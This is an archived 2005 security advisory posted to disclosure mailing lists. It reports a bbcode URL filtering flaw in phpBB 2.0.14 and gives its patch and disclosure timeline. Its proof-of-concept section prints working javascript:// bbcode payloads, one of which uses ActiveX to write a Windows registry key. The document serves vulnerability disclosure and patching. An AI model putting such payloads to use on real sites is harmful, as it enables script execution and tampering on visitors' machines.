CastleCops phpBB bbcode Input Validation Disclosure

From: Paul Laudanski (zx_at_castlecops.com)
Date: 06/02/05

  • Next message: Uwe Hermann: "[DRUPAL-SA-2005-001] New Drupal release fixes critical security issue"
    Date: Thu, 2 Jun 2005 15:33:01 -0400 (EDT)
    To: bugs@securitytracker.com, <bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>, <moderators@osvdb.org>, <news@securiteam.com>, <vuldb@securityfocus.com>, <vulndiscuss@vulnwatch.org>, <vuln@secunia.com>, <vulnwatch@vulnwatch.org>
    
    

    *CASTLECOPS.COM SUMMARY

    bbcode input validation

    Severity: High
    CastleCops: http://castlecops.com/t123194-.html
    CVE: CAN-2005-1193
    phpBB Security ID#: 266
    Bugtraq ID#: 13545
    Secunia #: 15298
    US-CERT VU#: 113196
    SecurityTracker #: 1013918

    Vulnerable: viewtopic.php, privmsg.php for phpBB 2.0.14 (possible all
    lower versions too), and other files that rely on bbcode.php

    Fix: Upgrade to 2.0.15

    *INTRODUCTION

    phpBB is a popular bulletin board system based on PHP. There is a lack of
    filtering for the BBCODE URL. Initially discovered: encapsulating a
    specially crafted URL, a user caught clicking on the resulting hyperlinks
    can have their registry entries modified without their knowledge [huge
    hazard!], among other things. Originally successfully tested with
    "javascript://", but subsequent discovery showed that "applet://",
    "about://", "activex://", "chrome://", and "script://" may be able to get
    thru as well with the URL enclosure or not (of course, browser dependant).

    It is recommended that these types of URIs not be allowed to render at all
    in the phpBB system as the possible user computer hijacking can be
    gargantuan. There is enough hijacking in spyware products (ref:
    http://castlecops.com/f67-Hijackthis_Spyware_Viruses_Worms_Trojans_Oh_My.html
    ).

    *PROOF OF CONCEPT

    This POC uses the URL encapsulation:

    [url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url]

    [url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22);window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url]

    [url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url]

    If you click on the second link, be sure to find and remove the "QQQQQ"
    entry in your Windows Registry. However, we recommend you do not click
    expect for developer testing and patching.

    *FIX

    The CastleCops suggested patch was integrated into bbcode.php. That
    suggested patch is within the includes/bbcode.php file,
    bbencode_second_pass function, after the global line (and a second
    location):

    + $text = preg_replace('#(script|about|applet|activex|chrome):#is',"\\1&#058;",$text);

    This particular patch replaces the colon with its decimal equivalent and
    will bypass hyperlink creation on viewing a topic or a private message.
    Both the POC and patch have been tested on some sites with success.

    This patch has been included in the phpbb 2.0.15 release. Please be sure
    to read the release in its entirety for the precise update:

    http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194

    *COMMENTARY

    Possible alternative patches?

    Modsecurity adds a nice layer of security in filtering requests to a
    website. However, the links above in the POC clearly show the web server
    may not process them as they are client side driven. Modsecurity would
    not help in the examples above.

    Whitelisting is another method, however it was decided to utilize the
    blacklist above by phpbb.

    *WEB BROWSERS USED

    Basic tests were done using Firefox and Internet Explorer. Your own
    mileage may vary.

    *CREDITS

    Discovery and patch by Papados and Paul Laudanski at http://castlecops.com

    *HISTORY

    Vendor A: phpbb.com
    Date Discovered: 20 Apr 2005
    Patch Given: 20 Apr 2005
    Vendor Notified: 20 Apr 2005
    Acknowledged: 20 Apr 2005
    Patch Released: 7 May 2005
    Pre-Full Disclosure: 8 May 2005
    Full Disclosure: 02 Jun 2005

    Vendor B: (nameless)
    Vendor Notified: 12 May 2005
    Acknowledged: 12 May 2005
    Responded: 26 May 2005 (Deemed a non-issue)

    *DISCLAIMER AND LICENSE

    ALL SUCH INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES ARE PROVIDED "AS
    IS" WITHOUT WARRANTY OF ANY KIND. CASTLECOPS, ITS AFFILIATES, AND/OR THEIR
    RESPECTIVE SUPPLIERS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH
    REGARD TO THIS INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES, INCLUDING
    ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A
    PARTICULAR PURPOSE, TITLE, AND NONINFRINGEMENT.

    Subject to terms in the CastleCops AUP:
    http://castlecops.com/article1.html.

    -- 
    Sincerely,
    Paul Laudanski .. Computer Cops, LLC.
    Microsoft MVP Windows-Security 2005
    CastleCops(SM)... http://castlecops.com
    CCWiki .......... http://wiki.castlecops.com
    CCForums ........ http://castlecops.com/forums.html
    BHO/Toolbars: http://castlecops.com/CLSID.html
    Windows XP/NT Services: http://castlecops.com/O23.html
    Extra IE Buttons: http://castlecops.com/O9.html
    Layered Service Providers: http://castlecops.com/LSPs.html
    StartupList: http://castlecops.com/StartupList.html
    ________ Information from Computer Cops, L.L.C. ________
    This message was checked by NOD32 Antivirus System for Linux Mail Server.
      part000.txt - is OK
    http://castlecops.com
    

  • Next message: Uwe Hermann: "[DRUPAL-SA-2005-001] New Drupal release fixes critical security issue"